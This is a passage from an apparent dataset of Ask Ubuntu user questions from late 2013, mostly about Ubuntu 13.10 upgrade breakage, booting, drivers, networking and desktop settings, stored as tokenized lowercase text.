unsurprisingly , other services on the machine ( mysql ) are not responding either . nmap is telling me that the ports are open , tho chris @ mu : /var/log $ nmap 192.168.212.56 starting nmap 6.00 ( http : //nmap.org ) at 2013-10-22 10:55 edt nmap scan report for sentry ( 192.168.212.56 ) host is up ( 0.00030s latency ) . not shown : 993 closed ports port state service 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3306/tcp open mysql 5666/tcp open nrpe
363817	disabling automatic shutdown ?	i am running ubuntu kiosk 12.04 on an intel dc3217iye , but it keeps shutting down when i leave it on during the night . i have tried : power settings . dconf-editor and zeroing everything having to do with idle/sleep/shutdown-timers . i installed windows 7 and left it powered on during a weekend to make sure it was n't the bios that was messing it up . does anyone have any suggestions as to how i would fix this ? i should add , that i 'm a complete novice when it comes to this os . thanks in advance
363821	how to use 'grep ' with characters like * and _ ?	i need to find some text in one or more files . this is what i use : grep -iri `` hello '' ~/ however , if i want to find a string containing characters like * or _ then these seem to be ignored . let 's say i want to search in all files for the string a**__ . how can i do that ? many thanks - i just ca n't figure this out !
363823	having trouble dual booting	i have windows 8 on a hp laptop and i can not boot from usb . i can only boot from a file on the usb . i have literally been trying to dualboot with ubuntu on and off for about a month now , looking at every forum , subreddit , even craigslist . no one else has been having this problem at all .
363833	corrupted iso image	how can i download a complete iso ? i have downloaded 13.10 in each variation using different browsers and even torrent . when i burn them to dvd or create a bootable usb , they wo n't boot from any machine . each download has something missing .
363834	how to remove `` europol '' malware that infected firefox in 13.04	i have recently started using ubuntu 13.04 . the other day i found the firefox browser blocked by malware . the website was from europol and said that it had blocked the browser and that 'everything ' had been encrypted . i have uninstalled firefox . i can still access files but i was wondering how i can eradicate this malware from my laptop . i have tried to install clamav , it did not work but the 2 do not have to be related .
363835	`` nvidia-304-updates '' vs `` nvidia-304 '' ( and similar ) ?	what is the difference between these two modules ? whoever created them did n't seem to think of including a clear description .
363837	upgrade to ubuntu 13.10 interupted , now pc wo n't boot	started the update for ubuntu 13.04 to 13.10 , but the laptop shutdown due to a known hardware problem where the system shuts off if the laptop has pressure on a certain location . when the laptop is turned on again ubuntu wo n't start up . is there anyway to fix this or restart the update somehow ? re-installing ubuntu can be done as all the files were backed up in dropbox , so no worries there .
363838	trying to install 13.10 on hipstreet equinox2 tablet	not sure how to install on tablets i 'm 13.10 on desktop so do i download a different ver for tablets
363841	how to share a folder using the ubuntu one web api	i have successfully implement oauth authorization with ubuntu one in django , here are my views and models : https : //gist.github.com/mariocesar/7102729 right now , i can use the file_storage ubuntu api , for example the following , will ask if path exists , then create the directory , and then get the information on the created path to probe is created . > > > user.oauth_access_token.get_file_storage ( volume='/~/ubuntu one ' , path='/websites/ ' ) < response [ 404 ] > > > > user.oauth_access_token.put_file_storage ( volume='/~/ubuntu one ' , path='/websites/ ' , data= { `` kind '' : `` directory '' } ) < response [ 200 ] > > > > user.oauth_access_token.get_file_storage ( volume='/~/ubuntu one ' , path='/websites/ ' ) .json ( ) { u'content_path ' : u'/content/~/ubuntu one/websites ' , u'generation ' : 10784 , u'generation_created ' : 10784 , u'has_children ' : false , u'is_live ' : true , u'key ' : u'moqgjsietb2wrr5zirbnta ' , u'kind ' : u'directory ' , u'parent_path ' : u'/~/ubuntu one ' , u'path ' : u'/websites ' , u'resource_path ' : u'/~/ubuntu one/websites ' , u'volume_path ' : u'/volumes/~/ubuntu one ' , u'when_changed ' : u'2013-10-22t15:34:04z ' , u'when_created ' : u'2013-10-22t15:34:04z ' } so it works , it 's great i 'm happy about that . but i ca n't share a folder . my question is ? how can i share a folder using the api ? i found no web api to do this , the ubuntu one syncdaemon tool is the only mention on solving this https : //one.ubuntu.com/developer/files/store_files/syncdaemontool # ubuntuone.platform.tools.syncdaemontool.offer_share but i 'm reluctant to maintain a dbus and a daemon in my server for every ubuntu one connection i have authorization for . any one have an idea how can i using a web api to programmatically share a folder ? even better using the oauth authorization tokens that i already have .
363842	how to make the dd command be verbose ?	i want to make a usb bootable by cloning an image . i did some research and i have n't found a satisfactory way of making dd provide some feedback back to the console of how the progress is going . is there a way , built into the command to do this , aside from polling the pid via the ps command ?
363843	ca n't delete an iptables chain	i 'm having a problem on deleting a user-defined chain . these the are rules i entered . sudo iptables -t mangle -n internet sudo iptables -t mangle -a prerouting -i eth1 -p tcp -m tcp -- dport 80 -j internet sudo iptables -t mangle -a internet -j mark -- set-mark 99 sudo iptables -t nat -a prerouting -i eth1 -p tcp -m mark -- mark 99 -m tcp -- dport 80 -j dnat -- to-destination 192.168.3.1 when i 'm using -x or -d , it gives me this error iptables : no chain/target/match by that name . edit : this is the command i used to delete the `` internet '' chain iptables -f internet i also tried using this : iptables -d internet and iptables -x internet but it still gives me the same message .
363852	what driver should i use with ati madison [ mobility radeon hd 5650/5750 / 6550m ]	i am using the opensource driver currently for this graphics card running ubuntu 13.04 vga compatible controller : advanced micro devices [ amd ] nee ati madison [ mobility radeon hd 5650/5750 / 6550m ] when i choose the last option ( fglrx-updates ) it only recognizes one out of three monitors . the opensource one works but i always need to reset the display everytime i reboot as it comes up in mirror mode for the 2 additional monitors ( one vga , one hdmi ) . also , i am wondering if another driver might be better for this ?
363854	how do i connect a custom wireless interface	how do i connect a virtual wireless adapter to the internet in linux/ubuntu . are the steps roughly the same as connecting to wifi with network manager down ? maybe i just nead to read more , in windows alot of the details behind this got burried i guess.. ill read more about http : //wireless.kernel.org/en/users/documentation/iw/vif and its implementations i guess ... but any help would be awesome thanks if you can help ! ( is there anyway to delete questions ive asked on askubuntu ? )
363855	update to saucy broke dash	i updated to saucy this morning , and my computer freaked out mid-way through and i was forced to power it off to get it to respond . when i restarted it ( naturally ) did n't work , so i launched a terminal and used apt to continue the install . i wish i remembered what i executed ... but i do n't . now i have my desktop back and everything seems to be working except the dash . super-key + typing now just shows me a spinner and nothing . i 've deleted zeitgeist and software center caches , and i 've tried to install unity-place-applications , but no effect , because i ca n't find it ... and it does n't feel like the sort of thing that would be in a separate ppa ... : $ sudo apt-get install unity-place-applications [ sudo ] password for cpfohl : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package unity-place-applications any ideas where i can start tracking this down ? all the apps are still there , i can launch them with the command line if i know where they are , but the dash just is n't doing anything useful .
363857	ubuntu 12.04 lts does n't recognize my benq monitor	i installed ubuntu 12.04 a few days ago , i found the operating system does n't recognize my benq monitor , then i type these commands below in terminal : $ sudo apt-get install read-edid $ sudo get-edid | parse-edid and here is the result : parse-edid : parse-edid version 2.0.0 get-edid : get-edid version 2.0.0 performing real mode vbe call interrupt 0x10 ax=0x4f00 bx=0x0 cx=0x0 function supported call successful vbe version 300 vbe string at 0x2110 `` intel ( r ) 82945g chipset family graphics chip accelerated vga bios '' vbe/ddc service about to be called report ddc capabilities performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x0 cx=0x0 function supported call successful monitor and video card combination does not support ddc1 transfers monitor and video card combination supports ddc2 transfers 0 seconds per 128 byte edid block transfer screen is not blanked during ddc transfer reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function supported call failed the edid data should not be trusted as the vbe call failed error : output block unchanged parse-edid : io error reading edid please help me to solve this problem . thanks .
363858	can not boot from usb wtih ubuntu 13.10	i downloaded ubuntu 13.10 amd64 iso and used all of following methods to make a install media . unetbootin universal usb installer ( from windows ) but i can not boot from usb pen drive . some time it just drop me in grub menu of previously installed ubuntu 13.04 . sometime it show a message `` could not open //fallback.efi : 14 ... '' for a moment and then just stays there ( blank screen ) . how to boot from usb pen drive ?
363860	ubuntu not visible in windows network and vice versa	i have two pc 's on network , one is running ubuntu 12.04 64bit and another is running windows vista ultimate 32bit . i can ping both the pc 's from the other and i can browse their files using ip address , but the problem is both the pc 's are not detected by the other while browsing in the network folder . i have also verified the workgroup name , its set as 'workgroup ' in both the pc 's . now , i dont know what else to check . any suggestions please ?
363861	laptop touchpad not working in ubuntu 12.10	i have recently installed ubuntu 12.10 in my laptop , lenovo 3000 y 500 . my touchpad is not working at all but my usb mouse is working . i am new to linux , so i have no idea whats going on . please help ... .this is what xinput -- list showed . virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb mouse id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ usb 2.0 camera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ ideapad extra buttons id=12 [ slave keyboard ( 3 ) ]
363862	problems with mtp on nexus 4 and ubuntu 13.10	i have had some sort of scripts installed ( i think that they were something with go-mtpfs ) but i can not get those running anymore after upgrade to 13.10 . basically what happens now is when i plug in the nexus in i get the following in dmesg [ 1735.057817 ] usb 2-1.3 : usb disconnect , device number 5 [ 1739.696027 ] usb 2-1.3 : new high-speed usb device number 6 using ehci-pci [ 1739.792273 ] usb 2-1.3 : new usb device found , idvendor=18d1 , idproduct=4ee1 [ 1739.792282 ] usb 2-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1739.792288 ] usb 2-1.3 : product : nexus 4 [ 1739.792293 ] usb 2-1.3 : manufacturer : lge [ 1739.792297 ] usb 2-1.3 : serialnumber : xxxxxxxxxxxxxxxx i have also tried this : $ ll /media/ | grep nexus drwxrwxrwx 2 user user 0 jan 1 1970 nexus $ sudo mtpfs -o allow_other /media/nexus unable to open ~/.mtpz-data for reading , mtpz disabled.listing raw device ( s ) device 0 ( vid=18d1 and pid=4ee1 ) is a google inc ( for lg electronics/samsung ) nexus 4/10 ( mtp ) . found 1 device ( s ) : google inc ( for lg electronics/samsung ) : nexus 4/10 ( mtp ) ( 18d1:4ee1 ) @ bus 2 , dev 6 attempting to connect device android device detected , assigning default bug flags and after few seconds i would get error 7 : found a bad handle , trying to ignore it . listing file information on device with name : ( null ) fuse : mountpoint is not empty fuse : if you are sure this is safe , use the 'nonempty ' mount option having installed go-mtpfs 0.1-1~20130108~webupd8~quantal libmtp-common 1.1.6-2 libmtp-runtime 1.1.6-2 libmtp9 : amd64 1.1.6-2 libnet-smtp-ssl-perl 1.01-3 mtp-tools 1.1.6-2 mtpfs 1.1-4.1 i can get the nexus mounted in nautilius but only with playlists and internal storage and if i press internal storage i get new window with the same content ( infinite loop ) .
363864	free up ctrl+q in ubuntu 12.04 lts	ctrl+q interferes with some applications under ubuntu 12.04 lts . it seems to be a system-wide setting that closes the current application . all i want to do is let each application control it . i can not find a setting for it in keyboard settings , etc . how can i get ctrl+q `` out of the way '' ?
363865	how to restore drive icon on unity launcher ?	i have 2 windows drive icon on unity launcher but i unlock 1 from unity launcher . how to restore it ?
363866	ca n't change desktop wallpaper after upgrading to 13.10	i have just upgraded my ubuntu 13.04 to 13.10 . all things working fine but i ca n't change my desktop wallpaper . whenever i try to change , it changes to solid color only . i 'm using the gnome desktop , not unity . please help me out
363868	synaptic on startup	i 'm using xfce 4.10 on ubuntu 13.10 . when i reboot my computer , it always opens the synaptic package manager . how can i modify some starting script such that it wo n't open it at the startup ?
363869	powerbroker ( likewise-open ) + ubuntu 13.04 - > 13.10 upgrade	i just upgraded ubuntu from 13.04 to 13.10 , and now i ca n't log into active directory ; my system is integrated using powerbroker identity services ( pbis ) , which used to be called likewise-open . so far i have identified the following symptoms : i am able to log in with my credentials via ssh . the screen goes black when attempting log into my account via the login screen . i 've tried leaving the domain , purging pbis , and re-installing the latest version of pbis . i 've been trying the troubleshooting section i found here , but i have n't had any success . the relevant portion of the auth.log oct 22 09:30:26 mypc lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` myusername '' oct 22 09:30:29 mypc lightdm : pam_unix ( lightdm-greeter : session ) : session closed for user lightdm oct 22 09:30:29 mypc lightdm : pam_unix ( lightdm : session ) : session opened for user myusername by ( uid=0 ) oct 22 09:30:29 mypc lightdm : pam_unix ( lightdm : session ) : session closed for user myusername oct 22 09:30:30 mypc lightdm : pam_unix ( lightdm-greeter : session ) : session opened for user lightdm by ( uid=0 ) oct 22 09:30:30 mypc systemd-logind [ 718 ] : new session c5 of user lightdm . oct 22 09:30:30 mypc lightdm : pam_ck_connector ( lightdm-greeter : session ) : nox11 mode , ignoring pam_tty :1 oct 22 09:30:31 mypc dbus [ 535 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.129 '' ( uid=110 pid=5139 comm= '' /usr/lib/x86_64-linux-gnu/indicator-keyboard-servi '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.39 '' ( uid=0 pid=2024 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) my .xsession-errors log script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . /usr/sbin/lightdm-session : 5 : exec : init : not found
363870	ssh- starting an application on client instead of server	i am facing a weird problem . when i log on using ssh to my server start firefox there , ideally it should start firefox on that machine . however , it is starting firefox on my machine and not the cliet . why this is happening ? i am logging in to the server with ssh -x username @ ip after this just firefox
363871	i was trying to make a switch from unity to kde , and now my laptop hangs on boot	i recently asked how i could remove unity after installing kde ( used kubuntu-desktop ) , and was told to run a long apt-get command that boiled down to `` purge these unity packages and make sure kubuntu-desktop is installed with a reinstall '' . i ran it and restarted , and now my laptop hangs up when i boot . i end up on a black screen , without even the backlight . how can i fix this ?
363872	xubuntu 13.10 power button handling not working	i already searched for a solution about this issue but the one i found is not working for me . i already edited /etc/systemd/logind.conf handlepowerkey=ignore handlesuspendkey=ignore handlehibernatekey=ignore handlelidswitch=ignore and i set in the power manager to ask what to do when i press the button , but it keep shutting itself down . any clue ?
363873	qt compatibility with gtk themes ( qbittorrent ) ?	how can i make my qbittorrent look somewhat more like my gtk theme or just normal without switching/changing my current theme ? as usual i tried something and this came out : how it looks without changes : http : //i.stack.imgur.com/ky7ph.png how it looks when i save settings with `` qt settings 4 '' while having qbittorrent open : http : //i.stack.imgur.com/ruypu.png looks much better |:3 the problem is when i close and open it again it looks like there the settings did n't save . ( it looked like the first image ) i have no idea if i 'm misunderstanding some stuff here but this what i can make out of it . thanks for reading , any help kind of help would be quite nice .
363875	why is amazon lens on by default ?	why by default ? and how do we get canonical to listen to it 's users/customers ? i wanted to start programming and contributing to ubuntu on the user friendly side of things but i just ca n't get past this .
363878	how to install 32-bit matlab in ubuntu 64-bit ?	while running previous versions of ubuntu ( prior to 13.10 ) i was able to follow the instructions listed here to install 32-bit matlab while running 64-bit ubuntu . now in 13.10 i am no longer able to install the ia32-libs package which contains several dependencies that matlab uses . matlab uses a java installer so dpkg is no help . how do i meet these dependencies in ubuntu 13.10 and later ?
363880	after doing a fresh install of ubuntu 13.10 my usb keyboard and mouse wo n't work	i did a fresh install of ubuntu 13.10 , and when i tried to log in after the restart , my usb keyboard would n't turn on/register so i ca n't log in . is there any way to fix this problem , or should i just say screw it and go back to 13.04 ? my keyboard worked when my computer was on 13.04 , as did my mouse .
363882	after upgrading from 13.04 to 13.10 , holding super no longer brings up the help overlay . is it possible that a setting got switched somewhere ?	after upgrading from 13.04 to 13.10 , holding super no longer brings up the help overlay . holding super worked before upgrading . tapping the super key still brings up the hud , and holding it down still brings up the launcher and after a second or so shows the numbers on the applications . in compiz config manager , under ubuntu unity plugin - > launcher , the key to show the dash , launcher and help overlay is set to super . under ubuntu unity plugin - > general , `` enable shortcut hints overlay '' is checked .
363890	how to login to ubuntu 13.10 automatically ?	i just installed ubuntu 13.10 with the full disk encryption option selected . this asks me for a password before ubuntu even starts . i figure since i am already entering one password i could automatically login skipping the login password , however , this option does not seem to exist anymore . is this feature gone or is it disabled because of the encryption or what ?
363893	open nef file created from a coolscan scanner	is there a way on linux to open a raw .nef file created from a coolscan scanner ? i 'm not talking about .nef files created from a digital nikon camera but from a nikon scanner . i 've tried with rawtherapee and feh but without success .
363902	everything broken after removal of amazon search	i have removed the amazon lens and disabled the settings and since then i had an empty dash . i tried unity -- replace , which killed everything . i can understand that you want to make money with the distribution and i believe when you say that this is not something done on purpose but it leaves a pretty bad taste to it . i want to actually use ubuntu for my business but if ubuntu is going the microsoft way there is no need to change and i 'll wait for the next distro to implement a deskop management system . i will try sudo apt-get install ubuntu-desktop . if this is n't working i had it .
363903	problem after upgrading to 13.10	i am a new user to ubuntu and not a very accomplished user . i have dual partitioned my laptop , recently upgraded to windows 8.1 and also ubuntu 13.10.now when i boot into ubuntu i get a running line of 3 's and squiggles followed by scrolling ( with a fail on the line `` reload cups , upon starting avahi-daemon to make sure remote queues are populated '' ) . if i press any key , but mostly return , it will boot into the password page . any ideas ? thanks .
363904	put on startup vnc , only one session	how can i put on startup vnc server enterprise edition ? i configured the program vnc with password and port and it runs when i apply the program from the ubuntu interface , where are all the programs . but ! ! ! the problem is , when i access from terminal the program vncserver it creates a new virtual desktop with please help to put in start up the program vnc server ( user mode ) thanks
363908	how to change default wallpaper presentation ?	i 'm running the official release of 13.10 . upon adding wallpaper from my pictures folder , the default presentation rendering is automatically switched to zoom . i can then manually change it back to center but lightdm will have already used the zoomed image for it 's custom background , thus rendering it incorrectly . can i change the default wallpaper presentation from zoom to center or alternatively , force lightdm to reload it 's custom wallpaper after i 've set the presentation to center ?
363909	13.10 ca n't see results from software center in dash	in 13.04 everything was ok but in 13.10 i do n't see results from software center . i would like to install some apps using dash but whatever i type i get no results ( i select software center in sources section in applications scope ) , and i have online sources enabled . is there any fix for this
363910	no sound from ubuntu 13.10 after selecting output	hello i have headphones that i plug and unplug from time to time because i talk on skype . when i unplugged my headphones from my keyboard there was no sound from my speakers while i was playing music . i tried rebooting my computer and it did n't work . i have the right output selected and everything .
363912	how to remove amazon ?	can i completely remove amazon from ubuntu ?
363915	upgrading from 12.04 to 12.10 not booting	i tried to upgrade from 12.04 to 12.10 as per the official documentation . when the system is rebooting , it showed as ubuntu ( logo ) and now in the blank black screen from past one hour . i tried to power off and on , but it is the same . how to resolve this ? it 's very important .
363916	recompiling linux kernel source on changing syscalls.h and diff between make and time make	do i need to recompile the kernel source when i change asmlinkage param on syscalls.h ? i was doing a tutorial and i was succesful doing the hello world part of it . i changed the asmlinkage on the syscalls.h to accept a parameter and tried to compile my sample c++ file . the output was still printing as hello world when i tried to see the ouput using dmesg . do i have to every time recompile the kernel whenever i change the syscalls.h file ? also what is the difference between make and time make ? ( assuming time make is a fast install process ) please clarify thanks a lot ! ! !
363917	is my lenovo s103t compatible with touch screen compatible with ubuntu ?	can i install the latest version of ubuntu on my netbook and will my touch screen work ?
363919	how to recover windows files after new ubuntu installation wiped everything ?	well basically i was dualbooting win8 and ubuntu 13.04 . i wanted to try out 13.10 . so i booted a life usb and selected the option `` erase ubuntu 13.04 and install 13.10 '' . and turns out the new installation erased everything . any idea if i can recover any of it ?
363920	raid5 over lvm on ubuntu server 12.04.3	i 'm trying to create a raid5 software array using lvm . i use virtualbox as i 'm only learning how lvm works . so i 've created 4 virtual scsi drives and then did the following : pvcreate /dev/sd [ b-e ] vgcreate /dev/sd [ b-e ] raid5_vg lvcreate -- type raid5 -i 3 -l 1g -n raid_lv raid5_vg however , i get an error after the last command : warning : unrecognised segment type raid5 using default stripesize 64.00 kib rounding size ( 256 extents ) up to stripe boundary size ( 258 extents ) can not update volume group raid5_vg with unknown segments in it ! so it looks like raid5 is not a valid segment type . `` lvm segtypes '' also does n't contain 'raid5 ' entry : root @ ubuntu-lvm : ~ # lvm segtypes striped zero error free snapshot mirror so my question is - how could i create raid5 logical volume using lvm only ? it seems that it is possible , i saw a few references ( not for ubuntu , unfortunately ) for redhat and gentoo systems . i do n't want to use mdadm for now , until i find out that it is mandatory . some info about my system is below : root @ ubuntu-lvm : ~ # uname -a linux ubuntu-lvm 3.8.0i use ubuntu server 12.04.3 ( i686 ) -29-generic # 42~precise1-ubuntu smp wed aug 14 15:31:16 utc 2013 i686 i686 i386 gnu/linux root @ ubuntu-lvm : ~ # dpkg -l | grep lvm ii lvm2 2.02.66-4ubuntu7.3 the linux logical volume manager thanks .
363925	is an ubuntu one account required in order to use ubuntu 13.10 ?	is an ubuntu one account required in order to use ubuntu 13.10 ? if an account is not required , why was i asked for ubuntu one credentials when installing ubuntu 13.10 ?
363926	how can i configure ubuntu to take a static ip for wired ethernet from the network ?	i am running ubuntu 13.10 . due to an antiquated setup in my office , our it folks assign static ip 's based on mac address instead of using dhcp . however , they did not tell me what static ip they actually assigned me , so i can not do a fully manual static ip configuration ( ie , tell ubuntu the ip address myself ) . when i plug in my windows machine , i do not need to actually specify the static ip to windows ; it figures out what it is on its own . additionally , it also figures out dns without requiring me to specify the dns servers manually . how can i get ubuntu to do the same ? ( recall there is no dhcp server available here , only a mapping in the infrastructure side ) .
363929	ubuntu on macbook air mid-2013	i need to install ubuntu on my new mba for purposes of a cs class i will be taking soon . i have to use emacs for coding things we learn in my class . • how to i download ubuntu ? • can i download ubuntu from a usb thumb drive or an external hard drive ( i 'd prefer to do this from an external hard drive over a usb thumb drive , but either works well if possible ) ? • i already have ubuntu installed on an older pc laptop and the pc actually works better with ubuntu . i 've read some that ubuntu actually works slower than mac os x . is this true ? • finally , ubuntu is safe to install , correct ? it wo n't have any negative impacts on my new mac when working in os x ? thanks in advance ! : )
363931	completely disable a key	i have seen and already using xmodmap how do i remap certain keys ? but still xev shows million times of hitting the left ctrl key in a minute . is there a way to completely disable a key to even not show in xev ?
363938	booting ubuntu from usb stick on lenovo ideapad g580 ( i5 )	i ca n't install ubuntu on my laptop . every time i insert the usb stick and boot up the laptop it 's stuck for about 2 minutes one the lenovo screen . after that it boots freedos ( original os ) .
363939	booting directly in windows 8.1 after instaling ubuntu 12.04 lts	i installed ubuntu 12.04 lts over usb drive alongside my windows 8.1 and when installation was finished i pressed restart . and it booted directly in windows without asking me where do i wanted to go windows 8.1 or ubuntu . so how do i go to selection many to chose where i want to boot in ?
363942	how to remove soapui ?	i 've installed soapui by downloading it from its website ( http : //www.soapui.org/ ) , but i would now like to uninstall it . however , it installed using its own little installer so i do n't know what/where it added . is there an elegant way to remove it or to remove a software that installs like this in general ?
363944	internet connection problem tp link tf3200	recently an lighting strike killed my power supply and my newtork adapter on my motherboard ( biostar g41 m7 ) and i bought a new power supply and a network card ( tp link tf3200 ) and i 've tested it on windows and it works when i reinstall it over the existing network driver . but now i cant do nothing , i mean , each time i turn the computer on i need to type `` sudo dhclient eth1 '' in terminal which kinda gives me the access to the internet..
363945	networkmanager broken after upgrade to kubuntu saucy	i had kubuntu 13.04 on my thinkpad x220 , and i upgraded to 13.10 and i am not able to connect to a wired or wireless connection . the new network tray icon does not show any entries at all . in the menu of the tray icon , there is an error saying : require networkmanager 0.9.8 , found . i then tried the following : nmcli con ** ( process:3695 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : rejected send message , 3 matched rules ; type= '' method_call '' , sender= '' :1.64 '' ( uid=1000 pid=3695 comm= '' nmcli con `` ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=1116 comm= '' networkmanager `` ) error : nmcli ( 0.9.8.0 ) and networkmanager ( unknown ) versions do n't match . force execution using -- nocheck , but the results are unpredictable . nmcli dev ** ( process:3700 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : rejected send message , 3 matched rules ; type= '' method_call '' , sender= '' :1.65 '' ( uid=1000 pid=3700 comm= '' nmcli dev `` ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=1116 comm= '' networkmanager `` ) error : nmcli ( 0.9.8.0 ) and networkmanager ( unknown ) versions do n't match . force execution using -- nocheck , but the results are unpredictable . nm-tool ** ( process:3705 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : rejected send message , 3 matched rules ; type= '' method_call '' , sender= '' :1.66 '' ( uid=1000 pid=3705 comm= '' nm-tool `` ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=1116 comm= '' networkmanager `` ) networkmanager tool state : unknown ** ( process:3705 ) : warning ** : error : could not connect to networkmanager running those as root works , however . i was also able to run nmcli con up id dhcp which got my dhcp connection working and giving me internet access . that did not work using a wifi connection though , and i do need those . how can i get networking back to work without a reinstall ?
363946	keyboard buffer	is there a way to increase he size of the keyboard buffer ? using an external keyboard causes keystrokes to be missed . kbd works fine with mac and pc . laptop keyboard works as well .
363948	touchpad tap not working after nvidia driver	i 'm running ubuntu 13.04 with cinnamon as my desktop environment . i recently isntalled the nvidia propietary drivers ( directly from their webpage ) and now , the tap in my touchpad is not working . the touchpad is working because i can use the border to scroll but for some reason the tap is broken . here 's ther esult of my xinput list : $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ dualpoint stick id=14 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps dualpoint touchpad id=15 [ slave pointer ( 2 ) ] help is appreciated . thanks ,
363954	multiple version + v13 windows installer ?	right , i am trying to install several version of linux on my spare older drive and would appreciate your help . if i use the windows installer on my second drive ( which will contain the os 's ) , will i have to partition them for more or will it only let me install 1 ( ubuntu ) do i need to partition for more than 1 os ( s ) and would be unable to partition for more ? ubuntu 13.10 can be installed manually without partitioning , you can select your drive ect , ect . but does it auto part your drive for you ? in screenshot 3 it shows you can select your drive it looks like it auto partitions for you but i am unsure if it actually does . thank you for any help and assistance you can give me . ~josh
363955	gcc-4.8 header files	i am having some trouble using the header files provided by gcc-4.8 since updating to ubuntu 13.10 . when i compile with the intel compiler icc , it complains about not being able to find the header file bits/c++config.h . this file is located in /usr/include/x86_64-linux-gnu/c++/4.8/bits but the intel compiler is looking in /usr/include/c++/4.8/bits . the file c++config.h is not in this second location . i realize that i can work around this issue by including the first directory while compiling . my question is why are these two directories not the same : /usr/include/x86_64-linux-gnu/c++/4.8/bits /usr/include/c++/4.8/bits files for these directories are shown here in the libstdc++-4.8-dev package .
363956	`` test integrity '' in archive manager on ubuntu 13.10	i recently updated to 13.10 ( fresh install ) and i noticed archive manager does not provide a `` test integrity '' option for compressed files anymore . what am i doing wrong ?
363957	`` startup disk creator '' does n't see my usb hard disk	i have used startup disk creator several times before succesfully creating bootable usb pendrives from iso images . however , now i 'm trying to do the same with a western digital external usb portable hard disk ( it 's a disk proper , one of those that actually spin ) , and it is not even listed among the available devices in startup disk creator . what do i have to do in order to make it a bootable drive so that i can boot a live linux distro from it ? ! ? !
363961	working with command hp-plugin for printer	i am having a scanner/printer which needs hp-plugin , it is installed , some how i have forgotten what went wrong during installation because when i try to run sudo hp-plugin i get following error hp linux imaging and printing system ( ver . 3.12.2 ) plugin download and install utility ver . 2.1 warning : qt/pyqt 4 initialization failed . error : hp-plugin requires gui support ( try running with -- qt3 ) . try using interactive ( -i ) mode . when i am running with sudo hp-plugin -- qt3 i get error error : option -- qt3 not recognized what should i do now ?
363963	porting a unity lens to ubuntu 13.10	all in the title . i have a lens written in python which used to work . does n't anymore on saucy because it seems that everything changed . is there a guide somewhere to help with porting ? j.f . dockes
363965	how do i create different login sounds/greetings based on the time of day ? 13.04 desktop	i 'd like to have ubuntu 13.04 desktop `` greet '' me whenever i login and logout , using a .wav , mp3 or ogg file etc for example , after i login i 'd like ubuntu to say `` good morning robert '' which will be a recorded audio file , and this greeting will change based on the time of day - to one of 3 selections , morning , afternoon and evening . lets assume i 've chosen vlc as my music player , in regards to this question : how can i play different sounds each time i startup ? can someone show an example of what the script looks like with the 'time of day ' requirements ?
363966	ubuntu software center wo n't sign in	i 'm in a somewhat unusual situation where i 'm running a freshly installed ubuntu 13.10 on a /home partition that already existed before that . that is , all the settings are retained , including those for the ubuntu software center . i think this has caused a very specific issue , though : the software center thinks i am signed in , but i can not do anything related to my signed in account . this results in the following : '' sync between computers '' only shows my currently installed software on this system . `` reinstall previous purchases '' and `` turn on recommendations '' do absolutely nothing when i click on them . clicking `` write your own review '' on an application will cause a window to open , saying `` signing in ... '' . it never does . leaving that window open for half an hour i decided to cancel the action . so my question is : how do i fix this ? do i need to remove the settings for the software center ? how do i do this ?
363968	need help installing canon d530 drivers	the default printer app did n't pick the right drivers so i installed the drivers from the canon website which gave me a tar.gz file that i extracted and now i have the folder with the 32-bit and 64-bit drivers in there . i am running ubuntu 12.04 and wondering how i would i install the drivers so it can make my printer work .
363972	xubuntu 13.10 blank desktop after update	i 'm using xubuntu and upgraded to 13.10 as the system dialog suggested it . however , after rebooting and logging in ( the loginscreen still perfectly works ) , i only see a black desktop with an invisible mouse cursor , and my taskbar on the bottom . the invisible mouse is still useable as onmouseover effects apply . after searching through the internet for a solution ( the guest login still perfectly works ) , it seemed like the ati drivers may be the root of evil here and it had been suggested to remove all fglrx packages and continue with the open source driver . after uninstalling fglrx and rebooting , i 'm experiencing exactly the same issues as mentioned in this question : unity does n't load , no launcher , no dash appears no taskbar , no mouse , just the plain desktop background . the problem at this point , however , is , that i use xubuntu and xfce and none of the solutions of the mentioned thread was applicable for me so far as i do n't have unity or compiz .
